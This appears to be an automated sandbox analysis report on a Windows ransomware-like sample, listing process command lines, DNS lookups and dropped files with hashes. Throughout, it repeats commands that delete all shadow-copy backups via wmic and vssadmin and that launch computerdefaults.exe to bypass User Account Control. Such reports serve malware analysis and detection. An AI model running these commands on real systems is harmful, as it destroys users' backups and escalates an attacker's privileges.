cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""

C:\Windows\system32\wbem\wmic.exe

"C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"

C:\Windows\system32\wbem\WMIC.exe

C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"

C:\Windows\system32\wbem\WMIC.exe

C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"

C:\Windows\system32\vssadmin.exe

vssadmin.exe Delete Shadows /all /quiet

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2156,13699773363457989798,14984670261304531163,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2168 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2156,13699773363457989798,14984670261304531163,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2212 /prefetch:3

C:\Windows\system32\vssadmin.exe

vssadmin.exe Delete Shadows /all /quiet

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2156,13699773363457989798,14984670261304531163,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2816 /prefetch:8

C:\Windows\system32\vssadmin.exe

vssadmin.exe Delete Shadows /all /quiet

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,13699773363457989798,14984670261304531163,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3272 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,13699773363457989798,14984670261304531163,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3288 /prefetch:1

C:\Windows\system32\cmd.exe

cmd /c computerdefaults.exe

C:\Windows\system32\wbem\WMIC.exe

C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\system32\cmd.exe

cmd /c computerdefaults.exe

C:\Windows\system32\vssadmin.exe

vssadmin.exe Delete Shadows /all /quiet

C:\Windows\system32\wbem\WMIC.exe

C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\system32\cmd.exe

cmd /c computerdefaults.exe

C:\Windows\system32\cmd.exe

cmd /c computerdefaults.exe

C:\Windows\system32\ComputerDefaults.exe

computerdefaults.exe

C:\Windows\system32\ComputerDefaults.exe

computerdefaults.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,13699773363457989798,14984670261304531163,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4664 /prefetch:1

C:\Windows\system32\ComputerDefaults.exe

computerdefaults.exe

C:\Windows\system32\ComputerDefaults.exe

computerdefaults.exe

C:\Windows\system32\wbem\wmic.exe

"C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"

C:\Windows\system32\wbem\wmic.exe

"C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"

C:\Windows\system32\vssadmin.exe

vssadmin.exe Delete Shadows /all /quiet

C:\Windows\system32\wbem\wmic.exe

"C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"

C:\Windows\system32\vssadmin.exe

vssadmin.exe Delete Shadows /all /quiet

C:\Windows\system32\wbem\wmic.exe

"C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"

C:\Windows\system32\vssadmin.exe

vssadmin.exe Delete Shadows /all /quiet

C:\Windows\system32\vssadmin.exe

vssadmin.exe Delete Shadows /all /quiet

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,13699773363457989798,14984670261304531163,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4848 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,13699773363457989798,14984670261304531163,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4192 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,13699773363457989798,14984670261304531163,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4204 /prefetch:1

C:\Windows\system32\wbem\wmic.exe

C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"

C:\Windows\system32\cmd.exe

cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""

C:\Windows\system32\cmd.exe

cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""

C:\Windows\system32\wbem\WMIC.exe

C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"

C:\Windows\system32\wbem\WMIC.exe

C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"

C:\Windows\system32\vssadmin.exe

vssadmin.exe Delete Shadows /all /quiet

C:\Windows\system32\cmd.exe

cmd /c computerdefaults.exe

C:\Windows\system32\cmd.exe

cmd /c computerdefaults.exe

C:\Windows\system32\ComputerDefaults.exe

computerdefaults.exe

C:\Windows\system32\ComputerDefaults.exe

computerdefaults.exe

C:\Windows\system32\wbem\wmic.exe

"C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"

C:\Windows\system32\wbem\wmic.exe

"C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"

C:\Windows\system32\vssadmin.exe

vssadmin.exe Delete Shadows /all /quiet

C:\Windows\system32\vssadmin.exe

vssadmin.exe Delete Shadows /all /quiet

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2156,13699773363457989798,14984670261304531163,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5584 /prefetch:8

C:\Windows\system32\wbem\wmic.exe

C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"

C:\Windows\system32\cmd.exe

cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""

C:\Windows\system32\cmd.exe

cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2156,13699773363457989798,14984670261304531163,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5584 /prefetch:8

C:\Windows\system32\wbem\wmic.exe

C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"

C:\Windows\system32\cmd.exe

cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""

C:\Windows\system32\cmd.exe

cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,13699773363457989798,14984670261304531163,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5736 /prefetch:1

C:\Windows\system32\wbem\WMIC.exe

C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"

C:\Windows\system32\wbem\WMIC.exe

C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"

C:\Windows\system32\vssadmin.exe

vssadmin.exe Delete Shadows /all /quiet

C:\Windows\system32\cmd.exe

cmd /c computerdefaults.exe

C:\Windows\system32\cmd.exe

cmd /c computerdefaults.exe

C:\Windows\system32\ComputerDefaults.exe

computerdefaults.exe

C:\Windows\system32\ComputerDefaults.exe

computerdefaults.exe

C:\Windows\system32\wbem\wmic.exe

"C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"

C:\Windows\system32\wbem\wmic.exe

"C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"

C:\Windows\system32\vssadmin.exe

vssadmin.exe Delete Shadows /all /quiet

C:\Windows\system32\vssadmin.exe

vssadmin.exe Delete Shadows /all /quiet

C:\Windows\system32\wbem\wmic.exe

C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"

C:\Windows\system32\cmd.exe

cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""

C:\Windows\system32\cmd.exe

cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,13699773363457989798,14984670261304531163,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5396 /prefetch:1

C:\Windows\system32\wbem\WMIC.exe

C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"

C:\Windows\system32\vssadmin.exe

vssadmin.exe Delete Shadows /all /quiet

C:\Windows\system32\wbem\WMIC.exe

C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"

C:\Windows\system32\wbem\wmic.exe

C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"

C:\Windows\System32\cmd.exe

cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""

C:\Windows\System32\cmd.exe

cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""

C:\Windows\system32\cmd.exe

cmd /c computerdefaults.exe

C:\Windows\system32\cmd.exe

cmd /c computerdefaults.exe

C:\Windows\system32\wbem\WMIC.exe

C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"

C:\Windows\system32\ComputerDefaults.exe

computerdefaults.exe

C:\Windows\system32\wbem\WMIC.exe

C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"

C:\Windows\system32\vssadmin.exe

vssadmin.exe Delete Shadows /all /quiet

C:\Windows\system32\cmd.exe

cmd /c computerdefaults.exe

C:\Windows\system32\ComputerDefaults.exe

computerdefaults.exe

C:\Windows\system32\cmd.exe

cmd /c computerdefaults.exe

C:\Windows\system32\ComputerDefaults.exe

computerdefaults.exe

C:\Windows\system32\wbem\wmic.exe

"C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"

C:\Windows\system32\ComputerDefaults.exe

computerdefaults.exe

C:\Windows\system32\wbem\wmic.exe

"C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"

C:\Windows\system32\vssadmin.exe

vssadmin.exe Delete Shadows /all /quiet

C:\Windows\system32\wbem\wmic.exe

"C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"

C:\Windows\system32\vssadmin.exe

vssadmin.exe Delete Shadows /all /quiet

C:\Windows\system32\wbem\wmic.exe

"C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"

C:\Windows\system32\vssadmin.exe

vssadmin.exe Delete Shadows /all /quiet

C:\Windows\system32\vssadmin.exe

vssadmin.exe Delete Shadows /all /quiet

C:\Windows\system32\wbem\wmic.exe

C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""

C:\Windows\system32\wbem\WMIC.exe

C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"

C:\Windows\system32\wbem\WMIC.exe

C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"

C:\Windows\system32\vssadmin.exe

vssadmin.exe Delete Shadows /all /quiet

C:\Windows\system32\cmd.exe

cmd /c computerdefaults.exe

C:\Windows\system32\cmd.exe

cmd /c computerdefaults.exe

C:\Windows\system32\ComputerDefaults.exe

computerdefaults.exe

C:\Windows\system32\ComputerDefaults.exe

computerdefaults.exe

C:\Windows\system32\wbem\wmic.exe

"C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"

C:\Windows\system32\wbem\wmic.exe

"C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"

C:\Windows\system32\vssadmin.exe

vssadmin.exe Delete Shadows /all /quiet

C:\Windows\system32\vssadmin.exe

vssadmin.exe Delete Shadows /all /quiet

C:\Windows\system32\wbem\wmic.exe

C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"

C:\Windows\system32\cmd.exe

cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""

C:\Windows\system32\cmd.exe

cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""

C:\Windows\system32\wbem\WMIC.exe

C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"

C:\Windows\system32\wbem\WMIC.exe

C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"

C:\Windows\system32\vssadmin.exe

vssadmin.exe Delete Shadows /all /quiet

C:\Windows\system32\cmd.exe

cmd /c computerdefaults.exe

C:\Windows\system32\cmd.exe

cmd /c computerdefaults.exe

C:\Windows\system32\ComputerDefaults.exe

computerdefaults.exe

C:\Windows\system32\ComputerDefaults.exe

computerdefaults.exe

C:\Windows\system32\wbem\wmic.exe

"C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"

C:\Windows\system32\wbem\wmic.exe

"C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"

C:\Windows\system32\vssadmin.exe

vssadmin.exe Delete Shadows /all /quiet

C:\Windows\system32\vssadmin.exe

vssadmin.exe Delete Shadows /all /quiet

C:\Windows\system32\wbem\wmic.exe

C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"

C:\Windows\system32\cmd.exe

cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""

C:\Windows\system32\cmd.exe

cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""

C:\Windows\system32\wbem\WMIC.exe

C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"

C:\Windows\system32\wbem\WMIC.exe

C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"

C:\Windows\system32\vssadmin.exe

vssadmin.exe Delete Shadows /all /quiet

C:\Windows\system32\cmd.exe

cmd /c computerdefaults.exe

C:\Windows\system32\cmd.exe

cmd /c computerdefaults.exe

C:\Windows\system32\ComputerDefaults.exe

computerdefaults.exe

C:\Windows\system32\ComputerDefaults.exe

computerdefaults.exe

C:\Windows\system32\wbem\wmic.exe

"C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"

C:\Windows\system32\wbem\wmic.exe

"C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"

C:\Windows\system32\vssadmin.exe

vssadmin.exe Delete Shadows /all /quiet

C:\Windows\system32\vssadmin.exe

vssadmin.exe Delete Shadows /all /quiet

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,13699773363457989798,14984670261304531163,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2652 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,13699773363457989798,14984670261304531163,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5244 /prefetch:1

Network

Country Destination Domain Proto
US 8.8.8.8:53 83.210.23.2.in-addr.arpa udp
US 8.8.8.8:53 154.239.44.20.in-addr.arpa udp
US 8.8.8.8:53 68.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 104.219.191.52.in-addr.arpa udp
US 8.8.8.8:53 53.210.109.20.in-addr.arpa udp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
US 8.8.8.8:53 629824a0e2742e5066qbvpseec.gosmark.space udp
US 8.8.8.8:53 google.com udp
US 8.8.8.8:53 google.com udp
N/A 224.0.0.251:5353 udp
US 8.8.8.8:53 629824a0e2742e5066qbvpseec.gosmark.space udp
US 8.8.8.8:53 629824a0e2742e5066qbvpseec.gosmark.space udp
US 8.8.8.8:53 19.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 88.210.23.2.in-addr.arpa udp
US 8.8.8.8:53 629824a0e2742e5066qbvpseec.gosmark.space udp
US 8.8.8.8:53 66.112.168.52.in-addr.arpa udp

Files

memory/1920-13-0x000001C27DE10000-0x000001C27DE11000-memory.dmp

memory/1920-15-0x000001C27D6F0000-0x000001C27D6F1000-memory.dmp

memory/1920-12-0x000001C27D7B0000-0x000001C27D7B1000-memory.dmp

memory/1920-11-0x000001C27D7A0000-0x000001C27D7A1000-memory.dmp

memory/1920-10-0x000001C27D790000-0x000001C27D791000-memory.dmp

memory/1920-9-0x000001C27D750000-0x000001C27D751000-memory.dmp

memory/1920-8-0x000001C27D740000-0x000001C27D741000-memory.dmp

memory/1920-7-0x000001C27D730000-0x000001C27D731000-memory.dmp

memory/1920-6-0x000001C27D720000-0x000001C27D721000-memory.dmp

memory/1920-5-0x000001C27D710000-0x000001C27D711000-memory.dmp

memory/1920-4-0x000001C27D700000-0x000001C27D701000-memory.dmp

memory/1920-2-0x000001C27D7D0000-0x000001C27DE02000-memory.dmp

memory/2996-0-0x0000024B4A7B0000-0x0000024B4A7B5000-memory.dmp

C:\Users\Admin\Pictures\readme.txt

MD5 122ffc488eceddce642109f5b252892d
SHA1 e120e375448322b82d2e94641a40498e799d60f3
SHA256 58c8a8f6c976fd10805507a23c1c8da4298382d595be8e1ab90671004543a9e8
SHA512 48c1e48971485aa58879dbbbe368273848ef760420c5faa6bb20eee5a27fc7488e1f2c711086a00bed0a1879a10edbc893bf4381bebe312e69e593e815739c0b

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 34d2c4f40f47672ecdf6f66fea242f4a
SHA1 4bcad62542aeb44cae38a907d8b5a8604115ada2
SHA256 b214e3affb02a2ea4469a8bbdfa8a179e7cc57cababd83b4bafae9cdbe23fa33
SHA512 50fba54ec95d694211a005d0e3e6cf5b5677efa16989cbf854207a1a67e3a139f32b757c6f2ce824a48f621440b93fde60ad1dc790fcec4b76edddd0d92a75d6

\??\pipe\LOCAL\crashpad_2724_QILZIPWJPEOKEYPK

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 8749e21d9d0a17dac32d5aa2027f7a75
SHA1 a5d555f8b035c7938a4a864e89218c0402ab7cde
SHA256 915193bd331ee9ea7c750398a37fbb552b8c5a1d90edec6293688296bda6f304
SHA512 c645a41180ed01e854f197868283f9b40620dbbc813a1c122f6870db574ebc1c4917da4d320bdfd1cc67f23303a2c6d74e4f36dd9d3ffcfa92d3dfca3b7ca31a

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 56cc91a7e8bd71753355b502f638f7f0
SHA1 1d08f73f215361fe6b168836129914f3a367663b
SHA256 8c271253fae80fc9c09dbf938d74b449b4a0ac35de59271d31c2bc40ab44b9ab
SHA512 f1f0d575f7f65dce8851ef3c5a17703ee5805bfc50eb712eca91c4bc56876a7e359f1a0d6f41b428e3211ef56e71297d972495b6cf8e1a10b20520e8dcf676e2

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

MD5 6752a1d65b201c13b62ea44016eb221f
SHA1 58ecf154d01a62233ed7fb494ace3c3d4ffce08b
SHA256 0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd
SHA512 9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

C:\Users\Public\readme.txt

MD5 718777534403cdcf89b5d9b5f4b2f141
SHA1 3f49f57f3c25d60fef6d5593c9eb5a69b74a7b29
SHA256 619de8a85d1beac2e0b2c9cef08f56fc70859f6f4dd0f763d2175bdac746b0cb
SHA512 8018fdbec663355db212827869eb7744f615f58db96e9a12da248f40979d28d8057bcab945381e43cb346e0b3ded14743efd8b47727ca98e32e430b6519d7440

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 4d0f51471e24f7309ae414a2bbe2bff1
SHA1 c64686fe1880b71be6352389537d7d2a38212b01
SHA256 060e5e69e785e63ae6bc06110eb95d036f503faf65d73f1105e55bc5e969dad8
SHA512 fa7acf2eb34a5111c7a91a2a40eb4825eba46bd7c176003f086162ea75bc22f8bbda5a3d29bb1ba4c0aaf63cd4985ed9f8135f208e54b028a71137065a7a7ff4

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 dc2c1112f708a92b4b0dbbbad1d24a61
SHA1 80918ec06bd3cd3095fafd26b572b86751743791
SHA256 cbd77ffdd5b4b7a6b32563b92797d89d9f8c30eb4e8a36e0b2478e676fb14840
SHA512 0034bf3c699db1d1478cd62f5e1c213b0654eaf8fa30c87f8b61f42f1e9f3663a89ce9bcaaf35c026b861f39523f8e32e1f4466e0475cf613dad6f1a823f74d7

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\AutomaticDestinations\9b9cdc69c1c24e2b.automaticDestinations-ms

MD5 b3450ae459cb26e9628f930121f74493
SHA1 aa64786029bafd948b4b805733002592167bb9f2
SHA256 836b0070c142d89c36274a4ffbb2f11f77c5b32b41ea28526864a197930b9f3d
SHA512 f15670535418eb7dcd9e60458291aece0034cfa8fd719b98a27636bf2a3d530cba3001682eeac4057e56cc606474fa433728a6f8aa06eb2ca63425bed8f0c0c8

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\AutomaticDestinations\f01b4d95cf55d32a.automaticDestinations-ms

MD5 ba85e740a1981857f51dcbf3ee717a20
SHA1 e16d4778fc7233ca5d6cb9130c0f773bdfeab525
SHA256 0e7cf53fe045914b5b8bd6d21d6d912c3c4361d91d66a06e63f92c2a96db494f
SHA512 f2daf4a5707fc34216c5bb2db2fdb6ce45f08868baeacd4199eef3300b498263c7032ef9efd7e423698f7734cf4068577f0af4f528f81b39a189e95a2b97f47b

C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133784678792608327.txt

MD5 a92ad1db778413f85019dfeedf5b9544
SHA1 658bf63fa0a3e4db464536885c380a83e4b7a31e
SHA256 88276bb7f32e3a015fccfd732955a169f49620ad74de216aa5111075d4f79488
SHA512 b32a0cc2857cca729065813d84c8b7f514b17a5fe45dbaa7a5f26f1dd2eb14e8f61fe80ab7d6d99807045f67df6f12e825374ef07b2306e3d233720c25e93a7d

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\AutomaticDestinations\5f7b5f1e01b83767.automaticDestinations-ms

MD5 aa0cccbd5b9009cc8dbd75c190049df6
SHA1 8df6d5fcf6d004d03301f52383526af6c37b3db0
SHA256 387c35e065df17b032c0e1f002b0d3b2018672dd72258968bd29413477366fc1
SHA512 4a67057ff5bf88c71c2805c4a607e4a4cd9d3b4cfd5f2255e00159e6974fc30563613e71d099065a816218aa35b6b7464cdfeb22809975b13a6e4609f7b1d57a

memory/3768-397-0x000002D6A80F0000-0x000002D6A80F1000-memory.dmp

memory/3768-396-0x000002D6A8100000-0x000002D6A8108000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 a827fae33f47ff10417418cc05c27ca7
SHA1 592acb5696ddc69d12366b1d806a48a5723d51b3
SHA256 9853421f9e7232cd58c008744e2972b4c25177e50ae2c9af22c801e6369e96bb
SHA512 d22220b2edae67b14ebb2083bcf1db6aee9cedd97a7a4fba9bdb49bb206a5eb33477acdeb740931ba8a2301f48bf2a0b5b327996a4fd6e9f0ad7cbb1e0b9aaf8